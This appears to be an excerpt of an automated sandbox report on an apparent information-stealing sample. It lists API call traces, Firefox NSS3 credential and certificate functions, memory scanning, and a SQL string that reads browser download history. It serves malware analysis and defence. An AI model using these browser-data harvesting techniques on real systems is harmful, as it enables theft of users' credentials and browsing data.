                                                                                                                                                                                                                                                                  • Instruction ID: aef4c12bf204000238efda5fe5e5e9dd21f202e0fc48ff94a371194bc532045d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c814b57cdab89d3837f830ede82037ae697f8be5699d612b0f73810452a44c45
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF518475A147058FDB00EF78C0846AABBF4BF55349F168569E8D89BB08DB38E844CB91
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00416236
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041628C
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004162B2
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004162D2
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004162E6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 004162F9
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041630D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00416320
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: _EH_prolog.MSVCRT ref: 00415F6F
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415F8E
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: wsprintfA.USER32 ref: 00415FA6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: FindFirstFileA.KERNEL32(?,?), ref: 00415FBD
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: StrCmpCA.SHLWAPI(?,004268EC), ref: 00415FDA
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: StrCmpCA.SHLWAPI(?,004268F0), ref: 00415FF4
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2058169020-0
                                                                                                                                                                                                                                                                  • Opcode ID: 45620498fba386766b7d423dc4813140e04168b4f7615f5946dd0dd2d8eac59e
                                                                                                                                                                                                                                                                  • Instruction ID: 6e61398d1cb73a34fbfb51f2b80dea7b18ee066c05bf19cd4896778ad4286e53
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45620498fba386766b7d423dc4813140e04168b4f7615f5946dd0dd2d8eac59e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9641DDB2C00229ABCF11EBE1DC59EDE777CAF59354F0045AAB505E3051EA78D7C88BA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_Now.NSS3 ref: 6C91DCFA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C91DD40
                                                                                                                                                                                                                                                                  • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C91DD62
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C91DD71
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000), ref: 6C91DD81
                                                                                                                                                                                                                                                                  • CERT_RemoveCertListNode.NSS3(?), ref: 6C91DD8F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9306A0: TlsGetValue.KERNEL32 ref: 6C9306C2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9306A0: EnterCriticalSection.KERNEL32(?), ref: 6C9306D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9306A0: PR_Unlock.NSS3 ref: 6C9306EB
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C91DD9E
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C91DDB7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 653623313-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,6C98460B,?,?), ref: 6C913CA9
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C913CB9
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(?), ref: 6C913CC9
                                                                                                                                                                                                                                                                  • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C913CD6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C913CE6
                                                                                                                                                                                                                                                                  • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C913CF6
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C913D03
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C913D15
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1376842649-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C988C93
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: TlsGetValue.KERNEL32(6C9161C4,?,6C915F9C,00000000), ref: 6C968A81
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: TlsGetValue.KERNEL32(?,?,?,6C915F9C,00000000), ref: 6C968A9E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C915F9C,00000000), ref: 6C968AB7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: PR_Unlock.NSS3(?,?,?,?,?,6C915F9C,00000000), ref: 6C968AD2
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C988CFB
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C988D10
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: TlsGetValue.KERNEL32(?,00000000,6C9161C4,?,6C915639,00000000), ref: 6C968991
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: TlsGetValue.KERNEL32(?,?,?,?,?,6C915639,00000000), ref: 6C9689AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C915639,00000000), ref: 6C9689C6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: PR_WaitCondVar.NSS3 ref: 6C9689F7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C915639,00000000), ref: 6C968A0C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2412912262-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040753A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407806
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040781A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                                  • API String ID: 3193997572-2241552939
                                                                                                                                                                                                                                                                  • Opcode ID: bcc543eefcf2c2f2555299bea3a20ccd21b1770efe986b3215f9286995e717f4
                                                                                                                                                                                                                                                                  • Instruction ID: b3b447972ce448a953535ced37bc291fc8760a316390523261cb09c02331c862
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc543eefcf2c2f2555299bea3a20ccd21b1770efe986b3215f9286995e717f4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDB13C71904248EADB15EBE5D955BEDBBB4AF15308F2440BEE006735C2EB781B0CDB25
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9311C0: PR_NewLock.NSS3 ref: 6C931216
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C919E17
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C919E25
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C919E4E
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C919EA2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C929500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C929546
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C919EB6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C919ED9
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C919F18
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3381623595-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2bae78ade3733672dac9974a32122122cab77b995a94211c24591e95f68002e8
                                                                                                                                                                                                                                                                  • Instruction ID: 1972817d63d23663558fac8dc44e4b8eca3c64b793ff7ba2cba43821920d39c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bae78ade3733672dac9974a32122122cab77b995a94211c24591e95f68002e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 868127B5A04305ABEB009F34CC42AAB77A9BF6534CF054528EC8987F01FB31E918C7A1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: DeleteCriticalSection.KERNEL32(D958E852,6C931397,5B5F5EC0,?,?,6C92B1EE,2404110F,?,?), ref: 6C92AB3C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: free.MOZGLUE(D958E836,?,6C92B1EE,2404110F,?,?), ref: 6C92AB49
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: DeleteCriticalSection.KERNEL32(5D5E6CB2), ref: 6C92AB5C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: free.MOZGLUE(5D5E6CA6), ref: 6C92AB63
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C92AB6F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C92AB76
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C92DCFA
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C92DD0E
                                                                                                                                                                                                                                                                  • PK11_IsFriendly.NSS3(?), ref: 6C92DD73
                                                                                                                                                                                                                                                                  • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C92DD8B
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C92DE81
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C92DEA6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C92DF08
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 519503562-0
                                                                                                                                                                                                                                                                  • Opcode ID: cbe629f286b73179ca94c9465702527a4d338f610ced69eeeb7bb2bc58909159
                                                                                                                                                                                                                                                                  • Instruction ID: 316daf3da974013878913864d6e4b6196d3e3036b0143e19a5c7c7e12237443f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbe629f286b73179ca94c9465702527a4d338f610ced69eeeb7bb2bc58909159
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF91F8B6A101019FDB00CF68C880BABB7B5FF64309F258029DC599BB49E739E955CBD1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CERT_NewCertList.NSS3 ref: 6C93BD1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C912F0A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C912F1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C91B41E,00000000,00000000,?,00000000,?,6C91B41E,00000000,00000000,00000001,?), ref: 6C9557E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C955843
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93BD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                                                                                                                                  • CERT_DestroyCertList.NSS3(00000000), ref: 6C93BD9B
                                                                                                                                                                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C93BDA9
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C93BE3A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C913EC2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C913ED6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C913EEE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C913F02
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_FreeArenaPool.NSS3 ref: 6C913F14
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C913F27
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C93BE52
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C912CDA,?,00000000), ref: 6C912E1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C912E33
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: TlsGetValue.KERNEL32 ref: 6C912E4E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: EnterCriticalSection.KERNEL32(?), ref: 6C912E5E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableLookup.NSS3(?), ref: 6C912E71
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableRemove.NSS3(?), ref: 6C912E84
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C912E96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PR_Unlock.NSS3 ref: 6C912EA9
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C93BE61
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2178860483-0
                                                                                                                                                                                                                                                                  • Opcode ID: fdda6f5c8381f0c7779c51b719e01e12ac55ff0002c325abed93a51a095ae3f7
                                                                                                                                                                                                                                                                  • Instruction ID: 082df50db62114fa1c17c1a5001655888d98b8241af3ae89fc65916d5f7a0c62
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdda6f5c8381f0c7779c51b719e01e12ac55ff0002c325abed93a51a095ae3f7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 784102B5A00620AFD720DF28DC80B6A77F8EF65718F008168F91D97B51E731E814CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F3E3
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F404
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F21D: strlen.MSVCRT ref: 0040F229
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F21D: strlen.MSVCRT ref: 0040F23F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F21D: strlen.MSVCRT ref: 0040F2D8
                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F431
                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4FB
                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0040F50C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 3099930812-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: 457f95d425ff8579f573d6dca0f4886f4d1833ef28a55d566858e9a4949325cb
                                                                                                                                                                                                                                                                  • Instruction ID: 6ea3fad9e467bbecef6a9e2a918f74406e7a6d78594025b548e0e9c1aa0f586f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 457f95d425ff8579f573d6dca0f4886f4d1833ef28a55d566858e9a4949325cb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92419D71A00108AFDF24DFA4DD41AEF7BB6EB94318F10403AF901B21A1D7389E54DB98
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C95AB3E,?,?,?), ref: 6C95AC35
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C93CF16
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C95AB3E,?,?,?), ref: 6C95AC55
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
